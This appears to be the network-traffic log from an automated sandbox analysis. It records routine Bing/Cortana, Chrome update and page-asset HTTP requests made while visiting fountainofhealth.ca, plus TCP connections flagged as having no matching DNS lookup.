Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=0a7fb7675443474b93e6e79ff4d6eb08 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=684fe7139df74817b053fa7d309b3c6b HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ons&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=922546595914451b8005161047e609ff HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=onsc&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=41ddb61898e64595a74bb49d95e07614 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time

Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.169
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.169
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.169
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208

Source: global traffic	HTTP traffic detected: GET /chrome-variations/seed?osname=win&channel=stable&milestone=134 HTTP/1.1host: clientservices.googleapis.comif-none-match: SMChYyMDI1MDMwNi0xODMwMDQuNDI5MDAwEgkIABADGIYBIAA=#qBr8j3G36+k=a-im: x-bm,gzipsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdpriority: u=4, i
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: fountainofhealth.caupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /en HTTP/1.1host: fountainofhealth.caupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/speculation HTTP/1.1host: fountainofhealth.caorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: speculationrulesreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/resizable.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/core.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/views/css/views-responsive-grid.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /modules/ajax_loader/css/throbber-general.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/controlgroup.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/checkboxradio.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/align.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/button.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/dialog.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /modules/webform/js/webform.states.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/item-list.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/css/bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /npm/@unicorn-fail/drupal-bootstrap-styles@0.0.2/dist/3.4.0/8.x-3.x/drupal-bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/js/bootstrap.js HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
